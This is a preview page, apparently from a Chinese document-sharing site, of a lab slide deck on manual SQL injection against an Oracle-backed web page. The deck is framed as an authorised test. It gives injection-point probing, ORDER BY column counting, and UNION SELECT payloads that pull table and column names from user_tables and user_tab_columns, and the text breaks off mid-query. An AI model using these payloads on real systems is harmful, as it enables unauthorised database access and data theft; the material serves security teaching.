数据库安全——SQL注入与防范——手工注入Oracle数据库.pdf

数据库安全——SQL注入与防范——手工注入Oracle数据库.pdf

  1. 1、本文档共20页,可阅读全部内容。
  2. 2、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。
  3. 3、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载
  4. 4、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
查看更多
SQL注入与防范 ——手工注入Oracle数据库 1 任务场景 目录 2 任务分析 CONTENTS 3 预备知识 4 实验步骤 5 总结思考 01 任务场景 任务场景 • 小陈最近接手了公司的安全运维工作,打算对公司的网站进行一次测试,在取得领导审批后,小陈 决定先从注入点查找。 02 任务分析 任务分析 • 在不确定是否存在注入点的情况下,可以使用手工注入的方式检验注入点的存在与否,实现注入点 的查找,网站数据库的分析,数据库内容的读取。 03 预备知识 预备知识 • SQL注入,是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串, 最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意 的)SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意) SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语 句。 04 实验步骤 实验步骤 打开网络拓扑,点击启动选项,启动实验虚拟机使用ifconfig或ipconfig命令分别获取渗透机和靶机的IP地址, 使用ping命令进行网络连通性测试,确保主机间网络的连通性确认渗透机ip地址,确认靶机ip地址 实验步骤 访问01:81/Index.aspx?id=1 在id=1后加入引号再次访问,即01:8080/1/index.jsp?id=1,发现报错,说明此处存在注入点 实验步骤 确认注入点后,判断当前网站使用的数据库 通过order by 判断当前表的字段数,当order n返回正确页面而order by n+1 返回错误页面, 则说明当前表的字段数为n个。判断当前表的字段数目的是为了后面使用union select 联合查询语法 实验步骤 01:8080/1/index.jsp?id=1 order by 4 使用union select联合查询语句获取字符位 实验步骤 通过user_tables表读取当前用户名下所有的表名 01:8080/1/index.jsp?id=1 and 1=2 union select null,a,(select table_name from user_tables where rownum=1 and table_nameACCESS$) from dual 实验步骤 选取之前获得的表admin ,通过user_tab_columns表读取admin表中的所有字段名 01:8080/1/index.jsp?id=1 and 1=2 union select null,a,(select column_name from user_tab_columns where table_name=ADMIN and rownum=1 and column_nameID) from dual 实验步骤 01:8080/1/index.jsp?id=1 and 1=2 union select null,a,(select column_name from user_tab_columns where

您可能关注的文档

文档评论(0)

balala11 + 关注
实名认证
内容提供者

该用户很懒,什么也没介绍

1亿VIP精品文档

相关文档